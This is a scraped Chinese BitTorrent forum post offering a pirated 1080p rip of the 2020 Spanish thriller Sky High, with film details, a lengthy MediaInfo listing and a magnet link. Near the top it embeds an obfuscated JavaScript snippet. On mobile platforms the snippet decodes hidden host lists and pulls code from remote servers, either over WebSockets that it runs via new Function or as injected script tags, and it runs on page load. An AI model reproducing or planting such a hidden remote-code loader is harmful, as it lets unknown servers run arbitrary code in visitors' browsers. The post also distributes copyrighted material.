玩命巔峰[中文字幕].Sky.High.2020.Netflix.WEB-DL.1080p.x264.DDP5.1 8.57GB

版主小s 22天前 200

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 玩命巔峰/Sky High

◎片 名 Hasta el cielo

◎年 代 2020

◎产 地 西班牙

◎类 别 惊悚

◎语 言 西班牙语

◎上映日期 2020-08-28(西班牙)

◎豆瓣评分 5.1/10 from 342 users

◎豆瓣链接 https://movie.douban.com/subject/35048299/

◎导 演 丹尼尔·卡尔帕索罗 Daniel Calparsoro

◎编 剧 豪尔赫·格力加耶切瓦利亚 Jorge Guerricaechevarría

◎主 演 米盖尔·赫尔南 Miguel Herrán

路易斯·托萨尔 Luis Tosar

卡罗琳娜·尤斯特 Carolina Yuste

◎标 签 犯罪 | 西班牙 | 西班牙电影 | 剧情 | 2020 | 爱情 | netflix原创电影 | 欧洲电影

◎简 介

马德里郊区的技工安吉恋上爱丝翠拉之后,投入抢劫这门行当,因而成为一名警探穷追不舍的目标。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 119359646643419736551208932559017793814 (0x59CBD4EE5E28DF0E2BEC97184180D916)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.57 GiB

  8. Duration : 2 h 1 min

  9. Overall bit rate : 10.1 Mb/s

  10. Encoded date : UTC 2021-09-28 13:08:53

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 1 min

  23. Bit rate : 4 928 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.099

  34. Stream size : 4.20 GiB (49%)

  35. Default : Yes

  36. Forced : No


  37. Audio #1

  38. ID : 2

  39. Format : E-AC-3

  40. Format/Info : Enhanced AC-3

  41. Commercial name : Dolby Digital Plus

  42. Codec ID : A_EAC3

  43. Duration : 2 h 1 min

  44. Bit rate mode : Constant

  45. Bit rate : 640 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : L R C LFE Ls Rs

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 31.250 FPS (1536 SPF)

  50. Compression mode : Lossy

  51. Delay relative to video : -83 ms

  52. Stream size : 558 MiB (6%)

  53. Title : Europa Espa?ol

  54. Language : Spanish

  55. Service kind : Complete Main

  56. Default : Yes

  57. Forced : No


  58. Audio #2

  59. ID : 3

  60. Format : E-AC-3

  61. Format/Info : Enhanced AC-3

  62. Commercial name : Dolby Digital Plus

  63. Codec ID : A_EAC3

  64. Duration : 2 h 1 min

  65. Bit rate mode : Constant

  66. Bit rate : 640 kb/s

  67. Channel(s) : 6 channels

  68. Channel layout : L R C LFE Ls Rs

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Delay relative to video : -83 ms

  73. Stream size : 558 MiB (6%)

  74. Title : English

  75. Language : English

  76. Service kind : Complete Main

  77. Default : Yes

  78. Forced : No


  79. Audio #3

  80. ID : 4

  81. Format : E-AC-3

  82. Format/Info : Enhanced AC-3

  83. Commercial name : Dolby Digital Plus

  84. Codec ID : A_EAC3

  85. Duration : 2 h 1 min

  86. Bit rate mode : Constant

  87. Bit rate : 640 kb/s

  88. Channel(s) : 6 channels

  89. Channel layout : L R C LFE Ls Rs

  90. Sampling rate : 48.0 kHz

  91. Frame rate : 31.250 FPS (1536 SPF)

  92. Compression mode : Lossy

  93. Delay relative to video : -83 ms

  94. Stream size : 558 MiB (6%)

  95. Title : Deutsch

  96. Language : German

  97. Service kind : Complete Main

  98. Default : Yes

  99. Forced : No


  100. Audio #4

  101. ID : 5

  102. Format : E-AC-3

  103. Format/Info : Enhanced AC-3

  104. Commercial name : Dolby Digital Plus

  105. Codec ID : A_EAC3

  106. Duration : 2 h 1 min

  107. Bit rate mode : Constant

  108. Bit rate : 640 kb/s

  109. Channel(s) : 6 channels

  110. Channel layout : L R C LFE Ls Rs

  111. Sampling rate : 48.0 kHz

  112. Frame rate : 31.250 FPS (1536 SPF)

  113. Compression mode : Lossy

  114. Delay relative to video : -83 ms

  115. Stream size : 558 MiB (6%)

  116. Title : Fran?ais

  117. Language : French

  118. Service kind : Complete Main

  119. Default : Yes

  120. Forced : No


  121. Audio #5

  122. ID : 6

  123. Format : E-AC-3

  124. Format/Info : Enhanced AC-3

  125. Commercial name : Dolby Digital Plus

  126. Codec ID : A_EAC3

  127. Duration : 2 h 1 min

  128. Bit rate mode : Constant

  129. Bit rate : 640 kb/s

  130. Channel(s) : 6 channels

  131. Channel layout : L R C LFE Ls Rs

  132. Sampling rate : 48.0 kHz

  133. Frame rate : 31.250 FPS (1536 SPF)

  134. Compression mode : Lossy

  135. Delay relative to video : -83 ms

  136. Stream size : 558 MiB (6%)

  137. Title : Italian

  138. Language : Italian

  139. Service kind : Complete Main

  140. Default : Yes

  141. Forced : No


  142. Audio #6

  143. ID : 7

  144. Format : E-AC-3

  145. Format/Info : Enhanced AC-3

  146. Commercial name : Dolby Digital Plus

  147. Codec ID : A_EAC3

  148. Duration : 2 h 1 min

  149. Bit rate mode : Constant

  150. Bit rate : 640 kb/s

  151. Channel(s) : 6 channels

  152. Channel layout : L R C LFE Ls Rs

  153. Sampling rate : 48.0 kHz

  154. Frame rate : 31.250 FPS (1536 SPF)

  155. Compression mode : Lossy

  156. Delay relative to video : -83 ms

  157. Stream size : 558 MiB (6%)

  158. Title : Polski

  159. Language : Polish

  160. Service kind : Complete Main

  161. Default : Yes

  162. Forced : No


  163. Audio #7

  164. ID : 8

  165. Format : E-AC-3

  166. Format/Info : Enhanced AC-3

  167. Commercial name : Dolby Digital Plus

  168. Codec ID : A_EAC3

  169. Duration : 2 h 1 min

  170. Bit rate mode : Constant

  171. Bit rate : 640 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Delay relative to video : -83 ms

  178. Stream size : 558 MiB (6%)

  179. Title : Brasilan Português

  180. Language : Portuguese

  181. Service kind : Complete Main

  182. Default : Yes

  183. Forced : No


  184. Audio #8

  185. ID : 9

  186. Format : E-AC-3

  187. Format/Info : Enhanced AC-3

  188. Commercial name : Dolby Digital Plus

  189. Codec ID : A_EAC3

  190. Duration : 2 h 1 min

  191. Bit rate mode : Constant

  192. Bit rate : 640 kb/s

  193. Channel(s) : 6 channels

  194. Channel layout : L R C LFE Ls Rs

  195. Sampling rate : 48.0 kHz

  196. Frame rate : 31.250 FPS (1536 SPF)

  197. Compression mode : Lossy

  198. Delay relative to video : -83 ms

  199. Stream size : 558 MiB (6%)

  200. Title : Türk?e

  201. Language : Turkish

  202. Service kind : Complete Main

  203. Default : Yes

  204. Forced : No


  205. Text #1

  206. ID : 10

  207. Format : UTF-8

  208. Codec ID : S_TEXT/UTF8

  209. Codec ID/Info : UTF-8 Plain Text

  210. Duration : 2 h 0 min

  211. Bit rate : 65 b/s

  212. Count of elements : 1891

  213. Stream size : 58.0 KiB (0%)

  214. Title : English

  215. Language : English

  216. Default : Yes

  217. Forced : No


  218. Text #2

  219. ID : 11

  220. Format : UTF-8

  221. Codec ID : S_TEXT/UTF8

  222. Codec ID/Info : UTF-8 Plain Text

  223. Duration : 1 h 53 min

  224. Bit rate : 90 b/s

  225. Count of elements : 1437

  226. Stream size : 75.4 KiB (0%)

  227. Title : ???????

  228. Language : Arabic

  229. Default : Yes

  230. Forced : No


  231. Text #3

  232. ID : 12

  233. Format : UTF-8

  234. Codec ID : S_TEXT/UTF8

  235. Codec ID/Info : UTF-8 Plain Text

  236. Duration : 2 h 0 min

  237. Bit rate : 46 b/s

  238. Count of elements : 1578

  239. Stream size : 41.2 KiB (0%)

  240. Title : ?e?tina

  241. Language : Czech

  242. Default : Yes

  243. Forced : No


  244. Text #4

  245. ID : 13

  246. Format : UTF-8

  247. Codec ID : S_TEXT/UTF8

  248. Codec ID/Info : UTF-8 Plain Text

  249. Duration : 2 h 0 min

  250. Bit rate : 41 b/s

  251. Count of elements : 1344

  252. Stream size : 36.7 KiB (0%)

  253. Title : Dansk

  254. Language : Danish

  255. Default : Yes

  256. Forced : No


  257. Text #5

  258. ID : 14

  259. Format : UTF-8

  260. Codec ID : S_TEXT/UTF8

  261. Codec ID/Info : UTF-8 Plain Text

  262. Duration : 2 h 0 min

  263. Bit rate : 48 b/s

  264. Count of elements : 1525

  265. Stream size : 43.0 KiB (0%)

  266. Title : Deutsch

  267. Language : German

  268. Default : Yes

  269. Forced : No


  270. Text #6

  271. ID : 15

  272. Format : UTF-8

  273. Codec ID : S_TEXT/UTF8

  274. Codec ID/Info : UTF-8 Plain Text

  275. Duration : 2 h 1 min

  276. Bit rate : 81 b/s

  277. Count of elements : 1547

  278. Stream size : 72.1 KiB (0%)

  279. Title : Ελληνικ?

  280. Language : Greek

  281. Default : Yes

  282. Forced : No


  283. Text #7

  284. ID : 16

  285. Format : UTF-8

  286. Codec ID : S_TEXT/UTF8

  287. Codec ID/Info : UTF-8 Plain Text

  288. Duration : 2 h 0 min

  289. Bit rate : 66 b/s

  290. Count of elements : 1816

  291. Stream size : 59.0 KiB (0%)

  292. Title : Europa Espa?ol (SDH)

  293. Language : Spanish

  294. Default : Yes

  295. Forced : No


  296. Text #8

  297. ID : 17

  298. Format : UTF-8

  299. Codec ID : S_TEXT/UTF8

  300. Codec ID/Info : UTF-8 Plain Text

  301. Duration : 2 h 0 min

  302. Bit rate : 49 b/s

  303. Count of elements : 1338

  304. Stream size : 43.7 KiB (0%)

  305. Title : Suomi

  306. Language : Finnish

  307. Default : Yes

  308. Forced : No


  309. Text #9

  310. ID : 18

  311. Format : UTF-8

  312. Codec ID : S_TEXT/UTF8

  313. Codec ID/Info : UTF-8 Plain Text

  314. Duration : 2 h 0 min

  315. Bit rate : 48 b/s

  316. Count of elements : 1527

  317. Stream size : 43.3 KiB (0%)

  318. Title : Fran?ais

  319. Language : French

  320. Default : Yes

  321. Forced : No


  322. Text #10

  323. ID : 19

  324. Format : UTF-8

  325. Codec ID : S_TEXT/UTF8

  326. Codec ID/Info : UTF-8 Plain Text

  327. Duration : 2 h 0 min

  328. Bit rate : 79 b/s

  329. Count of elements : 1573

  330. Stream size : 70.0 KiB (0%)

  331. Title : ?????

  332. Language : Hebrew

  333. Default : Yes

  334. Forced : No


  335. Text #11

  336. ID : 20

  337. Format : UTF-8

  338. Codec ID : S_TEXT/UTF8

  339. Codec ID/Info : UTF-8 Plain Text

  340. Duration : 2 h 0 min

  341. Bit rate : 45 b/s

  342. Count of elements : 1476

  343. Stream size : 40.0 KiB (0%)

  344. Title : Hrvatski

  345. Language : Croatian

  346. Default : Yes

  347. Forced : No


  348. Text #12

  349. ID : 21

  350. Format : UTF-8

  351. Codec ID : S_TEXT/UTF8

  352. Codec ID/Info : UTF-8 Plain Text

  353. Duration : 2 h 0 min

  354. Bit rate : 49 b/s

  355. Count of elements : 1546

  356. Stream size : 44.1 KiB (0%)

  357. Title : Magyar

  358. Language : Hungarian

  359. Default : Yes

  360. Forced : No


  361. Text #13

  362. ID : 22

  363. Format : UTF-8

  364. Codec ID : S_TEXT/UTF8

  365. Codec ID/Info : UTF-8 Plain Text

  366. Duration : 2 h 0 min

  367. Bit rate : 50 b/s

  368. Count of elements : 1583

  369. Stream size : 44.7 KiB (0%)

  370. Title : Indonesian

  371. Language : Indonesian

  372. Default : Yes

  373. Forced : No


  374. Text #14

  375. ID : 23

  376. Format : UTF-8

  377. Codec ID : S_TEXT/UTF8

  378. Codec ID/Info : UTF-8 Plain Text

  379. Duration : 2 h 0 min

  380. Bit rate : 52 b/s

  381. Count of elements : 1580

  382. Stream size : 46.9 KiB (0%)

  383. Title : Italian

  384. Language : Italian

  385. Default : Yes

  386. Forced : No


  387. Text #15

  388. ID : 24

  389. Format : UTF-8

  390. Codec ID : S_TEXT/UTF8

  391. Codec ID/Info : UTF-8 Plain Text

  392. Duration : 2 h 0 min

  393. Bit rate : 83 b/s

  394. Count of elements : 1566

  395. Stream size : 73.8 KiB (0%)

  396. Title : 日本語

  397. Language : Japanese

  398. Default : Yes

  399. Forced : No


  400. Text #16

  401. ID : 25

  402. Format : UTF-8

  403. Codec ID : S_TEXT/UTF8

  404. Codec ID/Info : UTF-8 Plain Text

  405. Duration : 2 h 0 min

  406. Bit rate : 55 b/s

  407. Count of elements : 1587

  408. Stream size : 49.0 KiB (0%)

  409. Title : ???

  410. Language : Korean

  411. Default : Yes

  412. Forced : No


  413. Text #17

  414. ID : 26

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 2 h 0 min

  419. Bit rate : 49 b/s

  420. Count of elements : 1556

  421. Stream size : 43.7 KiB (0%)

  422. Title : Malaysia

  423. Language : Malay

  424. Default : Yes

  425. Forced : No


  426. Text #18

  427. ID : 27

  428. Format : UTF-8

  429. Codec ID : S_TEXT/UTF8

  430. Codec ID/Info : UTF-8 Plain Text

  431. Duration : 2 h 0 min

  432. Bit rate : 46 b/s

  433. Count of elements : 1535

  434. Stream size : 41.1 KiB (0%)

  435. Title : Norsk Bokm?l

  436. Language : Norwegian Bokmal

  437. Default : Yes

  438. Forced : No


  439. Text #19

  440. ID : 28

  441. Format : UTF-8

  442. Codec ID : S_TEXT/UTF8

  443. Codec ID/Info : UTF-8 Plain Text

  444. Duration : 2 h 0 min

  445. Bit rate : 47 b/s

  446. Count of elements : 1428

  447. Stream size : 42.0 KiB (0%)

  448. Title : Nederlands

  449. Language : Dutch

  450. Default : Yes

  451. Forced : No


  452. Text #20

  453. ID : 29

  454. Format : UTF-8

  455. Codec ID : S_TEXT/UTF8

  456. Codec ID/Info : UTF-8 Plain Text

  457. Duration : 2 h 0 min

  458. Bit rate : 44 b/s

  459. Count of elements : 1570

  460. Stream size : 39.1 KiB (0%)

  461. Title : Polski

  462. Language : Polish

  463. Default : Yes

  464. Forced : No


  465. Text #21

  466. ID : 30

  467. Format : UTF-8

  468. Codec ID : S_TEXT/UTF8

  469. Codec ID/Info : UTF-8 Plain Text

  470. Duration : 2 h 0 min

  471. Bit rate : 50 b/s

  472. Count of elements : 1516

  473. Stream size : 44.9 KiB (0%)

  474. Title : Português

  475. Language : Portuguese

  476. Default : Yes

  477. Forced : No


  478. Text #22

  479. ID : 31

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 2 h 0 min

  484. Bit rate : 50 b/s

  485. Count of elements : 1497

  486. Stream size : 45.2 KiB (0%)

  487. Title : Brasilan Português

  488. Language : Portuguese

  489. Default : Yes

  490. Forced : No


  491. Text #23

  492. ID : 32

  493. Format : UTF-8

  494. Codec ID : S_TEXT/UTF8

  495. Codec ID/Info : UTF-8 Plain Text

  496. Duration : 2 h 0 min

  497. Bit rate : 49 b/s

  498. Count of elements : 1551

  499. Stream size : 44.2 KiB (0%)

  500. Title : Roman?

  501. Language : Romanian

  502. Default : Yes

  503. Forced : No


  504. Text #24

  505. ID : 33

  506. Format : UTF-8

  507. Codec ID : S_TEXT/UTF8

  508. Codec ID/Info : UTF-8 Plain Text

  509. Duration : 2 h 0 min

  510. Bit rate : 79 b/s

  511. Count of elements : 1579

  512. Stream size : 70.8 KiB (0%)

  513. Title : русский язык

  514. Language : Russian

  515. Default : Yes

  516. Forced : No


  517. Text #25

  518. ID : 34

  519. Format : UTF-8

  520. Codec ID : S_TEXT/UTF8

  521. Codec ID/Info : UTF-8 Plain Text

  522. Duration : 2 h 0 min

  523. Bit rate : 51 b/s

  524. Count of elements : 1373

  525. Stream size : 45.9 KiB (0%)

  526. Title : Svenska

  527. Language : Swedish

  528. Default : Yes

  529. Forced : No


  530. Text #26

  531. ID : 35

  532. Format : UTF-8

  533. Codec ID : S_TEXT/UTF8

  534. Codec ID/Info : UTF-8 Plain Text

  535. Duration : 2 h 0 min

  536. Bit rate : 128 b/s

  537. Count of elements : 1558

  538. Stream size : 114 KiB (0%)

  539. Title : ???????

  540. Language : Thai

  541. Default : Yes

  542. Forced : No


  543. Text #27

  544. ID : 36

  545. Format : UTF-8

  546. Codec ID : S_TEXT/UTF8

  547. Codec ID/Info : UTF-8 Plain Text

  548. Duration : 2 h 0 min

  549. Bit rate : 52 b/s

  550. Count of elements : 1587

  551. Stream size : 46.3 KiB (0%)

  552. Title : Türk?e

  553. Language : Turkish

  554. Default : Yes

  555. Forced : No


  556. Text #28

  557. ID : 37

  558. Format : UTF-8

  559. Codec ID : S_TEXT/UTF8

  560. Codec ID/Info : UTF-8 Plain Text

  561. Duration : 2 h 1 min

  562. Bit rate : 79 b/s

  563. Count of elements : 1592

  564. Stream size : 70.1 KiB (0%)

  565. Title : Укра?нська

  566. Language : Ukrainian

  567. Default : Yes

  568. Forced : No


  569. Text #29

  570. ID : 38

  571. Format : UTF-8

  572. Codec ID : S_TEXT/UTF8

  573. Codec ID/Info : UTF-8 Plain Text

  574. Duration : 2 h 0 min

  575. Bit rate : 62 b/s

  576. Count of elements : 1592

  577. Stream size : 55.2 KiB (0%)

  578. Title : Ti?ng Vi?t

  579. Language : Vietnamese

  580. Default : Yes

  581. Forced : No


  582. Text #30

  583. ID : 39

  584. Format : UTF-8

  585. Codec ID : S_TEXT/UTF8

  586. Codec ID/Info : UTF-8 Plain Text

  587. Duration : 2 h 0 min

  588. Bit rate : 52 b/s

  589. Count of elements : 1589

  590. Stream size : 46.2 KiB (0%)

  591. Title : 中文(简体)

  592. Language : Chinese

  593. Default : Yes

  594. Forced : No


  595. Text #31

  596. ID : 40

  597. Format : UTF-8

  598. Codec ID : S_TEXT/UTF8

  599. Codec ID/Info : UTF-8 Plain Text

  600. Duration : 2 h 0 min

  601. Bit rate : 47 b/s

  602. Count of elements : 1579

  603. Stream size : 41.8 KiB (0%)

  604. Title : 中文(繁體)

  605. Language : Chinese

  606. Default : Yes

  607. Forced : No




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:A7F2ADD86D70352EFE8526541101AB9B07370EC0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回